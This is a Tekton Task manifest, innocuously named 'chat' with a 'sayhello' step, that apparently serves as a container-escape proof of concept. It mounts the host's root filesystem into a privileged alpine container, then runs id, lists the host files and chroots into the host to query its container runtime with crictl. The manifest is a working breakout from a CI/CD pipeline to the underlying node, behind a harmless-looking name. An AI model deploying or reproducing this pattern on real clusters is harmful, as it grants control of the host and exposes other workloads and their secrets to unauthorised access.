apiVersion: tekton.dev/v1beta1
kind: Task
metadata:
  name: chat
spec:
  volumes:
    - name: host-fs
      hostPath:
        path: /
  steps:
  - image: alpine
    name: sayhello
    securityContext:
      privileged: true
      allowPrivilegeEscalation: true
    volumeMounts:
    - name: host-fs
      mountPath: /host
    script: |
      #!/usr/bin/env sh
      echo "hello"
      id
      ls /host -l
      chroot /host crictl pods
      :
